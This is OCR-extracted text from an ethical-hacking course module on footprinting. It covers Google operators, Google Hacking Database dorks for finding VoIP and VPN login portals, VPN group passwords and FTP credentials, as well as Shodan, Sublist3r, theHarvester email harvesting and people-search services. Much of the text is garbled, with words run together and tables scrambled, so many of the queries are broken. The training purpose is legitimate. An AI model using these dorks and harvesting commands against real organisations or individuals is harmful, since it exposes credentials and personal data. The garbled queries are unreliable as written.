searchqueriesto extract sensitive or hiddeninformation.Theaccessed informationis thenused
byattackersto findvulnerabletargets.Footprinting usingadvancedGoogle hacking techniques
involveslocating specificstrings of text within searchresultsusingadvancedoperators i n the
Google search engine.
AdvancedGoogle hacking refersto the art of creating complex searchenginequeries.Queries
can retrieve valuabledataabout a targetcompany fram Google searchresults.Through Google
hacking,
the Google
operators
an
attacker
tries
Hacking
to find websites
Database
helpi n finding
(GHDB),
the required
that are vulnerableto exploitation.
a databaseof queries,to identify
text andavoiding
Attackerscan use
sensitive data.Google
irrelevantdata.UsingadvancedGoogle
operators, attackersc an locatespecific
applications.
search
stringsoftext suchas
Whena query without advancedsearchoperatorsis specified,
terms in anypartofthewebpage, including thetitle,text, URL,digital
specific
versions
ofvulnerableweb
Google traces the
files,andso on. To
confinea search, Google offersadvancedsearchoperators. Thesesearchoperators helpto
narrow downthe search queryandobtainthemost relevantandaccurate output,
Thesyntax to use an advanced searchoperatoris as follows:operator:search_term
Note:Donot enter anyspaces
betweenthe operator
andthe query.
SomepopularGoogle
advanced
search include:
operators
Source:http://www.googleguide.com
‘=
restricts searchresultsto the specified
site: Thisoperator site or domain.
For example,
the [games query givesinformation
site: www.certifiedhacker.com] on
gamesfromthecertifiedhacker site

Module 0 2 ical andCountermensores

Mackin ©by E-Comel
Copyright
allinurl:Thisoperatorrestricts resultsto onlythe pagescontaining
all the queryterms
specifiedi n the URL.

For example, the [allinurl:google career]queryreturns onlypagescontaining

the words
“google―
and“career―in the URL.
inurl: Thisoperator restricts the resultsto onlythe pages containing
the specified
word
in the URL
the [inurl:
Forexample, copysite:www.google.com]
query returns onlyGoogle
pagesin
whichthe
URL
has
theword “copy.―
restricts resultsto only
allintitle:Thisoperator the pagescontaining
all the queryterms
specified
in thetitle.
Forexample, the [allintitle:
detect malware]
query returns onlypages containing
the
words“detect―
and“malware― i n thetitle,

intitle:Thisoperatorrestricts resultsto onlythe pagescontainingthe specified

term in

the
title.
example,
For the[malware detectionintitle:help]
queryreturns only
pagesthathavethe
term “help―
in the title,andthe terms “malware― anywhere
and“detection― withinthe
page.
Thisoperatorrestricts resultsto onlythe pagescontaining
inanchor: the queryterms
specified
i n the anchort ext on linksto the page.

For example,
(on linksto
the [Anti-virus

“Anti-virus.―
inanchor:Norton] query returns onlypageswith
the word “Norton―
the pagescontaining andthe pagecontaining
the word anchor
text
allinanchor: restricts resultsto only
Thisoperator the pagescontaining
all queryterms
specified
in theanchortext on linksto the pages.
Forexample, the [allinanchor:
bestcloudservice provider] query returns onlypages for

and“provider.―contains
whichthe anchortext on linksto the pages the words“best,―
“cloud,―
“service,―

ofoperator
Google'spageof
cache:This displays cachedversion of a web instead the current
version the webpage.
Forexample, [cache:www.eff.org]
will showGoogle’s
cachedversion of the Electronic
Frontier Foundationhomepage.
link:Thisoperator or pagesthatcontain linksto the specified
websites
searches website
or page
For example,
[link:www.googleguide.com]
findspagesthat pointto Google Guide’s
home
page.
Note: According
regular
to Google’s
keyword
search.―
documentation,
“you
a
cannot combine link:searchwith
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
 Alsonote thatwhenyou combinelink:withanotheradvanced Google
operator, maynot
return all the pagesthat match.
displays
related:Thisoperator websitesthat are similaror relatedto the URLspecified.
Forexample,[related:www.microsoft.com] provides
the Google
search
engineresults
page withwebsitessimilarto microsoft.com.
findsinformationfor the specified
info: Thisoperator web page.
Forexample,{info:gothotel.com]
provides aboutthe nationalhoteldirectory
information
GotHotel.comhomepage.
location: findsinformationfor a specific
This operator location,
For example,
[location:
4 seasons restaurant]
will giveyou resultsbasedon the term “4
seasonsrestaurant.―

Filetype:
Thisoperator
allowsyou to searchfor resultsbasedon a file extension.
[jasmine]will provide
For Example, jpg filesbasedon jasmine.
What can a Hacker do with Google
Hacking?
attackercan create complex
‘An searchengine queries to filter largeamounts of searchresultsto
obtaininformation relatedto computer security.Theattacker usesGoogle operatorsthat help
locatespecificstringsof text within the searchresults.Thus, the attackercan not onlydetect
websitesand webservers that are vulnerable to exploitation butalsolocateprivate,sensitive
informationaboutothers, suchascreditcardnumbers, socialsecuritynumbers,
passwords,and
attackerstryto launchvarious possible
so on. Once a vulnerablesite is identified, attacks,
such
as bufferoverflowandSQL whichcompromise
injection, informationsecurity.
Examples
of sensitive informationon public
servers that an attackerc an extract with the help
of
Google
Hacking (GHDB)
Database queriesinclude:
+
Errormessagesthat contain sensitive information
+
passwords
Filescontaining
+
Sensitive
Pages
directories
logon
containing portals
Pages
containing
configurations or
networkvulnerability firewalllogs,
data,suchas IDS, and

Advisoriesand server vulnerabilities

Softwareversion information
Webapplication
source code
Connected
Hiddenweb pagessuchas intranet andVPNservices
if
loTdevicesandtheircontrolpanels,unprotected

ical andCountermensores
Mackin ©by E-Comel
Copyright
Example: AdvanceOperatorsyntax (intitle:intranet
Use Google inurl: intranet
+intext: "human resources―) to find sensitive informationabout a target
organizationand
Attackersuse the gathered
its employees, informationto perform socialengineeringattacks.
belowshowsa Google
Thescreenshot searchengine resultspage displaying
the resultsfor the
querymentionedabove.

HumanResources
|
MCADIntranet

HR Intranet:10Benefitsofan Intranetfor HumanResources

HR |
Intranet Software Claromentis

| -
HumanResources
intranet Universityof Hawall

2.1:
Figure
engine Operator
Search resusfor givenGoogle
Advance syntax

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Google Database
Hacking
© T he
Google
(GHB)Hacking
an
Database
authoritative

of
Source forquerying
theever
reach he Google
‘widening

‘tacks d orks
use Googe in

to entact sensitive
operators
information
aboutthelrtarget

login
p ages, and
w ebsites

Google Database
Hacking
Source:https://www.exploit-db.com
Google
‘The Hacking
Database (GHDB) is an authoritativesource for queryingthe ever-widening
scopeof the Googlesearchengine.In the GHDB, you will findsearchterms forfilescontaining
usernames,vulnerableservers, andeven files containing passwords. TheExploit Databaseis a
CommonVulnerabilities and Exposures (CVE) compliant archive of publicexploits and
correspondingvulnerablesoftware,developed for use bypenetration testers and vulnerability
researchers.
UsingGHDBdorks,attackerscan rapidlyidentifyall the publicly
available exploits
and
vulnerabilities
target
organization’s
infrastructure.
advancedsearch Attackers
of the
Google
dorks
Google
operators
sensitive files,
servers, error messages,
IT
to extract sensitive information
use in
aboutthe target,suchas vulnerable
loginpages,andwebsites.
Google Hacking DatabaseCategories:
+
Footholds FilesContaining Infor
Juicy
+
FilesContaining
Usernames FilesContaining
Passwords
+
SensitiveDirectories SensitiveOnlineShopping
Info
WebServer Detection Networkor Vulnerability
Data
Vulnerable
Files agesContainingLoginortals
P
VulnerableServers VariousOnlineDevices
ErrorMessages Advisories
andVulnerabilities

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Google
Hacking
Database

2
Module 108
Page ical andountermessre
Mackin Coy recounet
 Sescipton
Goole
ork

VoIPandVPNFootprinting through Google Hacking Database

Google hackinginvolvesthe implementation of advancedoperators i n the Googlesearchengine
to matchspecific stringsoftext within thesearchresult.Theseadvanced helprefine
operators
searches to exposesensitive information,vulnerabilities,
and passwords. You can use these
Google
hacking
operators
Google
dorks
for VoIP or
extract informationsuchas pagescontaining
keysof VPNservers, andso on.
footprinting andVPNnetworks.
loginportals,VoIP loginportals,
Thus,youcan
directorieswith

Thefollowing hacking
tablessummarize someofthe Google or Google
operators dorksto obtain
specific
informationrelatedto VoIPandVPNfootprinting,
respectively.
Google queries
search for VoIP footprinting
Google
Dork Description
intitle:"Login
Page" Adapter Pages
intext:"Phone
portals,
login
containing
Contguretion
Utty

_|
configuration
inttle:"D-Link
SPA

VoIPRouter""Welcom
Findsthe Linksys
inurk/voiee/advanced/intitleinksys
page
VoIProuter configuration

Pages D-Linkloginportals.
containing
intitle:asterisk.management
portal
web-
portal
Looksfor the Asteriskmanagement
inte’

Configuration’
inttle:"SPASO4G Finds Configuration
CiscoSPASO4G
IPphones
Utilityfor

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Findsconfiguration
pagesfor onlineVoIP
Intitle:"Sipura.SPA.Configuration"
-.pdf devices
intitle:asterisk portalweb:
management

intitle:"Iogin’
inurl:8080 intext:―UserLogin―
FindstheAsterisk
webmanagement
portal

“English―
VoIP loginportals
forVolPfootriting
‘queries
Google queriesforVPNfootprinting
search

Google
Dork Description
CiscoVPNfileswith Group for remote
Passwords
"cisco""GroupPwd"
filetype:pef
VPNclientpasswords
FindsCisco (encrypted
but
"{main}"
"enc_GroupPwd="
ext:txt
cracked)
easily
of―intext:vpn
"Config" intitle:"Index Directorywith keys
of VPNservers

Inurl:/remote/login?lang=en FindsFortiGateFirewalls SSL-VPNloginportal

|Host=*.*intextienc_UserPassword=* Looksfor profile
configurationfiles(pc, which
extipef
filetype:ref
inurl:vpn
containuser
VPN
profiles
FindsSoniewallGlobalVPNClientfilescontaining
sensitiveinformationand login

filetype:pef
vpnORGroup Findspublicly
accessible.pcf
usedbyVPN
clients

vpnssi
Retrievesloginportals vpnssl
containing
companies’
access

inttle:"SSLVPNService"+ intext:"Your
system administratorprovided the
Ciscoasa login
Finds webpages
following informationto helpunderstand
and remedy the security
conditions:
2.2:Google
Table search
queriesfor
VPN
footprinting

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Other Techniques
for Footprinting
through
SearchEngines

{nformaon
aout helrg suchas mage
eos lg and new ces fom
ent

SETechniques FootprintingthroughEdEngines
Other for Search
=
Gathering
Information Google
Using Advanced
Search, and
Search,
AdvancedImage
Search
Reverse Image
‘An cannot always
attacker gather easily
information froman information-rich
site using
only@ normalsearchbox. A complicated
searchinvolvesa numberof interrelated
conditions,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Google's featurehelps
Advancedsearch an attackerto perform websearching,
complex
With Google AdvancedSearchandAdvancedImage Search,one can searchthe web
more precisely and accurately.
Youcan use thesesearchfeatures to achieve the same
precision as that achievedusing the advancedoperators but without typingor
remembering theoperators.Using Google’s
Advanced Searchoption,you can findsites
that may linkbackto the targetorganization’s
website.Thishelps to extract information
suchas partners,
Google
vendors,
AdvancedImage
andso on.
clients,
otherofthe
and affiliations targetwebsite.
Searchto acquireimagesof the target,i ts location,
Youcan use
employees,

To perform
Google,
Settings
an advanced
of
searchi n click at thebottom-right
home page, and then chooseAdvancedsearch i n the menu or directlytype
theGoogle

anyadvanced
https./Avww google.com _search i n the addressbar. Advanced searchallows

of
you to specify number criteria that the searchmust match,as this patternbuilds
cn the searchboxpatternbyadding more search options.To dothis,you choosea field
Then,enter the stringyou want to searchfor i n the field's text box andclickon the
AdvancedSearch button. Bydefault,various valuesare joined togetherwith "and"
{meaning
togetheralof
them for needto match)
with "or" (meaning
except sets,blocks,
anyof themcan match).
andformats,whichare joined

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Advance Search
2.3:Gooale
Figure
To perform an advanced image _—search_—
in. Google, _type
https./vww
google.com/advanced_image_search
i n the address bar.Advancedimage
searchallowsyouto tweakyourimagesearch i n a number ofways.Youcan searchbased
o n imagecolor,domain, file type,size,keyword,andso on. Todothis,you choosea field
Then, enter the stringyou want to search for i n thefield'stext boxand clickon the
‘AdvancedSearchbutton.

ical andCountermensores
Mackin ©by E-Comel
Copyright
To perform
Figure
2.4: Advance
Google Search
Image
a reverse imagesearchin Google, typehttps://www.google.com/imghp in
the addressbar. Reverse imagesearchallowsyou to use a n imageas a searchquery.You
can upload an imageor pastethe URLof the imagein the reverse imagesearchengine.
The
search
engine
verifies allonline
the searchengineindexanddisplays

source and detailsof the images,suchas photographs,

original
locations
the
the imagein the searchresultspage.Theresultsobtainedcan helpyou in tracking
profilepictures,
of
the
and
memes
Attackersuse onlinetoolssuchas GoogleImage Search,
TinEye ReverseImage Search,
YahooImage Search, and Bing
Image Searchto perform
a reverse imagesearch.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Google
Seachusing
Figure25:Reverse Image Google
Gathering
InformationfromVideoSearchEngines
Video search enginesare Internet-basedsearch enginesthat crawlthewebforvideo
content. Thesevideosearchengines either provide the functionality
of uploading
and
hosting videocontent on their own webservers or parsevideocontentthat is hosted
externally.Thevideocontent obtainedfromvideosearchengines is of highvalue,as it
be usedfor gathering
‘can informationaboutthe target.Video searchenginessuchas

YouTube,
Google
videos,
Yahoo
videos,
Bing
videos for and
content basedon theformattypeandduration,
allowattackersto search video

Microsoft

26: Screenshot
Figure ofYouTube search
showing cesultsforMicrosoft

ical andCountermensores
Mackin ©by E-Comel
Copyright
Aftersearching
forvideosrelatedto the targetusingvideo search
engines,a n attacker
can furtheranalyze hiddeninformationsuchas the time/date
thevideocontent to gather
andthumbnail
of
the
video.
video
andVideoReverser.com, tools
analysis
such
as
Using YouTube EZGif,
DataViewer,
an attackercan reverse a videoor convert a videointo text and
otherformatsto extract criticalinformationaboutthetarget

YoutubeDataViewer
SSTEEE)

Figure2.7:
Screenshot
ofYouTube showing
DataViewer ideo analyse
result

Gathering
Informationfrom Meta Search Engines
Meta searchenginesare a differenttypeof searchenginesthat use othersearchengines
(Google,
time
span.
Bing,Ask.com,etc.) toproduce
Thesesearchenginesdo not results
theirown
have
their
the inputsfromthe users and simultaneously
fromthe Internetin averyshort
indexes;
instead,
they
own search take
sendout the queriesto the third-party
searchenginesto obtainthe results.Oncesufficientresultsare gathered, theyare ranked
according andpresented
to their relevance to the user throughtheweb interface. Meta
searchenginesalsoincludea functionality whereby identicalsearchresultsare filtered
‘utso thatif the user searches thesame
the same queryagain,then it will not display

ical andCountermensores
Mackin ©by E-Comel
Copyright
resultstwice. A meta search engineis advantageouscompared to simple
search
engines,
asit can retrieve more resultswith the same amount of effort.
Usingmeta searchengines,suchas Startpage, MetaGer,andeTools.ch,attackerscan
send multiplesearchqueriesto severalsearchenginessimultaneously and gather
detailedinformationsuchas informationfrom shopping
substantially sites (Amazon,
eBay,etc.),
images,
videos,
news,
articles
different
sources.
blogs, and
searchenginesalso provide
address.
from Further,
privacy to the searchengineuser byhiding
meta
the user'sIP

Startpage com

Figure
tS
2.8:Sreenshot
of MetaSearch StartPage.com
Engine search
showing resus for Twiter

Gathering
Informationfrom FTPSearchEngines
FTP search enginesare used to search for fileslocatedo n FTP servers that contain
valuable informationabout the targetorganization. Manyindustries,institutions,
companies,
that are sharedamongtheir employees.
project.org)
A special
can beusedto access the FTPaccounts;
file
anduniversities use FTPservers to storelarge archivesandothersoftware
clientsuchas Filezilla(hetps://filezilla-
it alsosupportsfunctionalitiessuch
as uploading, downloading, and renamingfiles. Although FTPservers are usually
protected with passwords,manyservers are left unsecured andcan beaccessed through
webbrowsers directly
Using
FTPsearchenginessuchas NAPALMFTPIndexer, GlobalFTPSearchEngine, and
FreewareWeb attackerscan searchfor criticalfilesand directories
FTP File Search,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 valuableinformation
containing suchas business tax documents,
strategies, employee's
personal
records,
financialrecords,
licensedsoftware,
andotherconfidentialinformation.
Listedbelow are some of the important advancedGoogle
searchqueriesto find FTP
servers:

GoogleDork Description

| pont
intext:.tpconfig
inurkgithub.com
typermilinurl:ftp
extpaf|ps
issues
| ReturnsSFTP/FTP
server
credentials
Returnssensitivedirectorieson FTP
on Github

[inon:pue
[intle*index
inttendex of
|―[
ers pret cotigvatin
servers

OFinteststt-configon Exvoesstof FP/STposswors

inurle"ftp://www." /*
“Index of Displays
rom
various
exposing

online FTPservers sublime

ies
tet

inurl:~/ftp://193 | txt |__|

filetype:(php Returnsalist of FTPservers byIP address,mostly
html[ asp | xml| enf | sh)~Zatenl Windows NT servers withguest logincapabilities
Table
showni n the screenshot,
‘As
search
2 3: Google

attackers
queries to findFTPservers
can use the NAPALMFTP Indexer
onlinetool to
searchforcriticalfilesanddocumentsrelatedto the targetdomain.

cartons ZICASAS ya

Figure
2.9;Sereenshotof Engine
FTPSearch NAPALM
FTP
Indexer
ical
showing

Mackin
search
resultsforMicrosoft

andCountermensores ©by E-Comel

Copyright
Gathering InformationfromloTSearch Engines
(IoT)
Internetof Things searchenginescrawlthe Internet for loTdevicesthat are publicly
accessible.Througha basicsearch
on thesesearch engines,an attackercan gaincontrol
of Supervisory Controland DataAcquisition (SCADA) systems,traffic controlsystems,
Internet-connected householdappliances, industrial appliances,
CCTV cameras, ete.
Many of theseloTdevicesa re unsecured,
ie.,theyare without passwords or theyusethe
defaultcredentials,
whichcan beexploitedeasilybyattackers.
Withthe helpof loT searchenginessuchas Shodan,
obtaininformationsuchas the manufacturer
hostname, andopen portsof the target
Censys,
details,
andThingful,
geographical
loT device.Using
attackers
IP address,
location,
this information,
the attacker
can
can establish
a backdoor to the loTdevicesandgain accessto themto launchfurther
attacks.
showni n the screenshot,
‘As attackerscan use Shodan to findall the loT devices
ofthe
targetorganizationthat are havingopen portsandservices.

Sereensho
Figure 2.10: of Shodan

ical
dev
showingSearch resusfor SCADA

andCountermensores
Mackin ©by E-Comel
Copyright
 andReonnaiance
Feotgrting

Services

Figure
211:Screenshot showing
ofShodan openportsandservices
@
of SCADA
system

Modul
2 120
Page ical MackinandCountermensores
©
Copyright
by E-Comel
 a
Finding Company's
Top-Level
Domains(TLDs)
and Sub-domains
j
C/E

‘domains
ya and

misfforam
nteraftcom

throughWeb Services
Footprinting
Webservicessuchas people
search sensitive information
servicescan provide aboutthetarget.
may alsoprovide
Internet archives sensitive informationthat hasbeenremovedfromtheWorld
WideWeb(WWW). sites,people
Socialnetworking searchservices,alertingservices,financial
andjobsites provide
services, informationabouta targetsuchas infrastructuredetails,physical
andemployee
location, details.Moreover,groups,forums, andblogs can helpattackers in
gatheringsensitive informationabout a target,suchas public networkinformation,system

strategy
system
and personal
information,
attacks.
information.
Using thisinformation,
to breakinto the targetorganization’s may
an attacker build a hacking
networkand carryout other typesof advanced

you with finding

Thissection aims to familiarize thetargetcompany’s
top-level
domains,
sub-
domains,and geographicallocation,performingpeople
searchon socialnetworking sites and
people
search services,gatheringinformation
fromjobsites,financial data
services,third-party
performing
repositories, deepanddark web footprinting,determining the operatingsystem,
VOIPandVPN

Finding
footprinting
a Company's
through
Domains(TLDs)
Top-Level
gathering
Shodan,
andSub-domains
competitiveintelligence,
etc.

company’s
‘A top-level domains(TLDs)andsub-domains can providea large amount of useful
informationto an attacker.Apublicwebsiteis designed to showthe presence of an organization
on the Internet.It is available
forfreepublic access. It is designed
to attract customers and
partners.It maycontain informationsuchas organizational history,
services and products,and
contact information, Thetargetorganization’s
externalURLcan be locatedwith the helpof
searchengines
such
as
Google
and Bing.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Google

‘an
GresDomain
Names
Owned
by Meron

Meroson
acquired

Great
Ten
Names
Owned
Domain by Microsof-N amePros

TenGreat Domaln
Names
Ouned byMicosof- NamePros

2:12:Google
Figure search results
engineshowing fr givensyntax
The sub-domainis availableto onlya few people. Thesepersonsmay be employees of an
organization or members of a department.
In manyorganizations, websiteadministrators
create
sub-domains to test new technologies beforedeploying themon the main website.Generally,
thesesub-domains are i n the testing
stageandare insecure;hence, theyare more vulnerableto
various exploitations. Sub-domains provideinsights
into the different
departments andbusiness
Units i n an organization. Identifying
suchsub-domains may revealcriticalinformationregarding
the target,suchas the source codeof the websiteand documents on thewebserver. Access
restrictionscan beapplied basedon the IPaddress,domainor subnet, username,andpassword

common functions
helps
Thesub-domain
Most
to accesstheprivate
Therefore,
formatsfor sub-domains.
of an organization. organizations
a hackerwho knowsthe externalURLof 2
use

company
the
sub-domain
Netcraft. or
by
using
a
can oftendiscover throughtrialanderror, service such
as

You can also use the advancedGoogle

searchoperatorshownbelowto identify
all the sub
domainsofthetarget
site:microsoft.com -inurl:wnw

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ThirdParty
Disclosures

MicrosoftDevelope

LineToolsFor Developers
WindowsCommand TheVisualStudioBlog
-

Toolsto SearchCompany's
Sub-domains
Netcraft
Source:https://www.netcraft.com
Netcraft provides services, including
Internet security anti-fraud and anti-phishing

services,
application
testing, analyze
market
systems,
servers, operating
andPCIscanning.They
hosting
providers
also the shareofweb
andSSLcertificateauthorities,
andother
of
the
parameters Internet.
shownin the screenshotbelow,attackerscan
‘As use Netcraft to obtain all the sub-
domainsrelatedto the target
domain.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 _Mlercrart
*.microsoft.com
Hostnamesmatching
> Qsearch
another
with
pattern?
First 500 results (showing
41to 60)

Sublist3r
Figure2.14:
of
ScreenshotNetcraftdisplaying
subdomains
of microsoft.com

Source:https://github.com
Sublist3r
is a Python
scriptdesigned of websitesusing
to enumerate the subdomains
COSINT.
it
It
helps enables
youto enumerate subdomains across
testers and bughuntersi n collecting
penetration
the domaintheyare targeting.
multiple
once.
sourcesat
andgathering
It enumerates subdomains
Further,
subdomains
for
usingmanysearchengines
suchas Google, Yahoo, Bing,Baidu, and Ask,It also enumerates subdomains
using
Netcraft, VirusTotal,
ThreatCrowd, DNSdumpster, andReverseDNS.
Syntax:
sublist3r
THREADS]
[-d DOMAIN][-b BRUTEFORCE]
[-e ENGINES][-o OUTPUT]
[-p PORTS][-v
VERBOSE
[-t
2
Module 126
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Short
| |
Form Long
Form
domain Domain name
of
Description
to enumerate subdomains

| bruteforce Enablethesubbrutebruteforcemodule

ports
_|
Scanthe foundsubdomains
~verbose Enablethe verbose
specific
against
modeanddisplay
TCPports
resultsi n realtime

| Specifyof
threads
to
-threads Number
comma-separated
engines a
use forsubbrute
bruteforce
listof searchengines

_| ~output Savethe resultsto text file

a

~help
message
Showthe help
Table
andexit
2.4Sublist options withdesrption

Examples
1:
‘As
helps
attackers of
shownin the screenshot,
Sublist3r
a targetcompanyfrommultiple
sourcesat the same time,
in thesubdomains
enumerating

Screenshot
Figure2.35: ofSublist of google
dlplaying sub-domains com

ical andCountermensores
Mackin ©by E-Comel
Copyright
Examples
2:

Sublist3r
attackers
specific enumerating
subdomains
alsohelps
portopen, with
in the of a targetcompany a

shownin the screenshot,

‘As attackerssearchfor subdomains of google.com
(-d
google.com)
usingthe Bing
searchengine (-eBing)
with port80 (-p
80) open.

Figure2.16:
Pentest-Tools
Sublistof
Screenshot
of displaying
FindSubdomains
sub-domains
google.com
withpor 80open

Source:https://pentest-tools.com
Pentest-Tools
FindSubdomainsis an online tool usedfor discovering
subdomains
and
their IPaddresses,
including
networkinformationandtheirHTTPservers.
showni n the screenshot,
‘As attackerssearchfor sub-domains
relatedto microsoft.com

addresses,
titles
information
to obtaincritical
about the targetcompanydomain,
servers used,
systems,
operating technology as
such sub-domains,
web platform,
used,
IP
and page

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure2.17
Screenshot playingsub-domain
ofPetes Tools ofmicrosoft
com

2
Modul 127
Page tical andCountermensores
Making by Comet
Copyright©
 the Geographical
Finding Locationof the Target

bling, seer camer,

tes, plcestoe, weak

the Geographical
Finding Locationof the Target
Informationsuchas the physical plays
locationof an organization a vital role i n the hacking
process.Attackerscan obtainthisinformation usingfootprinting.
In addition to the physical
location,
a hackercan alsoacquireinformationsuchas surrounding public Wi-Fihotspots that
mayoffera
way
to breakinto the targetorganization's

with theknowledge
Attackers of a targetorganization's
network,
locationmayattemptdumpster
diving,
surveillance, attacksto gather
socialengineering, andother non-technical more information
Oncetheattackersdiscern thelocationofthetarget,they c an obtaindetailed
satelliteimagesof
the locationusing various sources availableon the Internetsuchas Google Earthand Google
Maps. Theattackerscan usethisinformation to gainunauthorized accessto buildings,
wiredand
wirelessnetworks, andsystems.
Toolsfor Finding
the Geographical
Location
Thetoolsfor findingthe geographical
locationallowyou to find andexplore most locationson
the earth.They provideinformationsuchas imagesof buildings, as well as their surroundings,
includingWi-Fi networks.Toolssuchas Google Maps even locateentrances of the building,
securitycameras, and gates.Thesetools provide interactive maps,outline maps,satellite
own maps. Google
imagery,andinformationon how to interact with and create one’s Maps,
YahooMaps, and other tools providedrivingdirections,trafficconditions, landmarks, and
detailedaddressandcontact information,
Attackersmayuse toolssuchas Google Google
Earth, Maps,andWikimapia, to find or locate
entrancesto buildings,
security places
cameras,gates, to hide,
weakspotsin perimeter fences,
andutilityresources suchas electricity
connections,
to measure the distancebetweendifferent
objects,
andso on.

Modul
2 128
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 andReonnaiance
Feotgrting

=
Google
Earth(https://earth.google.com)
Attackersuse the Google thistool,
Earthtool to find the exact locationof a target.Using
attackerscan even access 3D imagesthat depict most of the populated Earth’s
surface
with a highresolution,The detail allowsattackersto obtain street views, altitude
information,andeven coordinates.

Figure2.28: of Google
Screenshot Earth

Modul
2 129
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 People SitesandPeople
Search on Social Networking Search
Services
"
Senterandtaseanpredaewant
|S
|
person
The neonsearch
cn providet ea
Information
about or on orpnitaton,

2 @‘
aaa
Searchon SocialNetworking
People Sites
Searching
for a particular
person on a socialnetworking
websiteis fairlyeasy.Socialnetworking
services are onlineservices, platforms,
or sites thatfocuson facilitating
the building
ofsocial
networksor socialrelationsamongpeople. Thesewebsitescontain informationthat users
provide They
in theirprofiles. helpto directly
or indirectly
relatepeople
to eachother through
various fieldssuchas common interests,worklocation,
andeducation,
Socialnetworking sites allow people to shareinformationquickly, as theycan update their
personal detailsin realtime. Suchsitesallowusersto update factsaboutupcomingor current
events,recent announcementsand invitations, and so on. Socialnetworking sites are a great
platform forfinding people andtheirrelatedinformation. Manysocialnetworking sites allow
visitors
networkingto
search
people on
for without registeringthe site;this makes
sites an easyandanonymous people
on searchingsocial
task.A user can search for a personusingthe name,
email,or address.Somesites allow users to checkwhetheran account Is active,whichthen
provides informationon the statusof the personbeing searched.
Socialnetworking sites suchas Facebook, Twitter,Linkedin, and Instagram allowyou to find
people byname, keyword, company, school,friends, colleagues,
andthe people livingaround
them.Searching
forpeopleon thesesitesreturns personal
information
suchas name, position,
organization
name,
professional
ID,photos,
current
location,
educational
qualifications.
also
and
informationsuchas companyor business,
videosandso on. Socialnetworking
In addition,
current location,
phone
you can
number,
find
email
sites suchas Twitterare usedto shareadvice,
ews, concerns,opinions,rumors, andfacts.Through people searching
on socialnetworking
services, an attackercan gathercriticalinformation that will helpthem in performing
social
engineeringor otherkindsof attacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 2.39:Seeenshat
Figure showing
ofFacebook search
results

People
Searchon People
SearchServices
Youcan use public recordwebsitesto find informationaboutemailaddresses, phone numbers,
houseaddresses, andother information.Many individualsuse onlinepeople searchservices to
findinformationabout other people. Generally, online people searchservices suchas pipl,
Intelius,BeenVerified, Whitepages, and PeekYouprovide people’s
names, addresses, contact
details,date of birth,photographs, videos,profession, detailsabout theirfamily and friends,
socialnetworking profiles,propertyinformation, andoptional background on criminalchecks.
Further,onlinepeople searchservices may often reveal the profession of an individual,
businesses ownedbya person, upcoming projects and operating environment, websitesand
blogs,contact numbers, importantdates, companyemailaddresses, cellphone numbers, fax
numbers, and personal e-mailaddresses. Using this information,an attackercan try to obtain
bank details, creditcarddetails,pasthistory, and so on. This informationprovesto be highly
beneficialforattackersto launchattacks.Thereare many
that help i n obtaining
informationregarding people. available
online
Examples
peoplesearchservices
of suchpeoplesearch services

pipl,
includeIntelius, andAnyWho,

ical andCountermensores
Mackin ©by E-Comel
Copyright
People
searchservice Intelius
-

Source:https://www.intelius.com
‘Attackers
to
numbers,
can
use
the
addresshistory,
Inteliuspeople
thetargetorganization.
searchonlineservice to searchfor people
thisservice,attackersobtaininformation
Using
age,dateof birth,
relatives,
previous workhistory,
belonging
suchas phone
educational
background,
andso on

‘Search
results for Nicolas Cage
in United States)

2. Ncoas
cape,
EEXEEEEEEEED age

Screenshoto f ites
Figure2.20;
People
Search

ical andCountermensores
Mackin ©by E-Comel
Copyright
 InformationfromLinkedIn
Gathering CEH

Informationfrom LinkedIn
Gathering
Linkedinis socialnetworking
a websitefor professionals. It connects the world’s
human
resourcesto andsuccess.Thesite contains personal
aid productivity informationsuchas name,
position, name, current location,
organization educationalqualifications,
andso on. Information
gathered fromLinkedinhelps a n attackeri n performing socialengineeringor otherkindsof
attacks.
Attackerscan use theHarvestertool to gather
informationfrom Linkedinbasedon the target
organization
name:
theHarvester
Source:http://www.edge-security.com
theHarvesteris a tool designed
usedforopen-source
threat landscape
intelligence
to be usedi n the early
gathering
andhelps of
stagesa penetration
to determinea company's
on the Internet. Attackersuse thistool to perform
test. It is
external
enumeration on the
Linkedinsocialnetworking site to findemployees ofthetargetcompanyalong withtheir
jobtitles.
‘As
on LinkedIn: the uses
shownin thescreenshot,attacker thefollowing
command
to enumerate users

thearvester -d microsoft -1 200 -b linkedin

In the abovecommand, -d specifies
thedomainor companyname to search, -| specifies
the numberof resultsto be retrieved,
and -bspecifies
thedatasource as Linkedin.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attackerssearcho n LinkedIn

theHarvester
sng
search resultfram Unkedin
 Harvesting
Email Lists

Harvesting
Email Lists
Gathering
emailaddresses
relatedto the targetorganization
actsas an attackvector
important
during
thelaterphases
ofhacking.
Attackers
can use automated
toolssuchas theHarvester
and
Email Spiderto collect publicly
availableemail addresses of the employeesof the target
Thesetoolsharvestemaillistsrelatedto a specified
organization. domainusingsearchengines
suchas Google,Bing,andBaidu.Attackersuse theseemaillistsandusernamesto perform social
engineeringandbruteforceattackso n the target
organization.
=
theHlarvester
Source:http://www.edge-security.com
Attackersuse theHarvester tool to extract emailaddresses
relatedto the targetdomain,
For example, attackersu se the following command to extract email addressesof
microsoft.com usingthe Baidusearchengine:
theharvester -d microsoft.com -1 200 -b baidu
Inthe above
command,
to -b
tells
the results 200,and
-d specifies

engine;alternatively,
thedomainusedfor harvesting the emails,
-| will mit
theHarvesterto extract the resultsfromthe Baidusearch
you can use Google,
Bing, etc.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
2.23
Screenshot showing
theHarvester
command
extract
to
email addresses

4
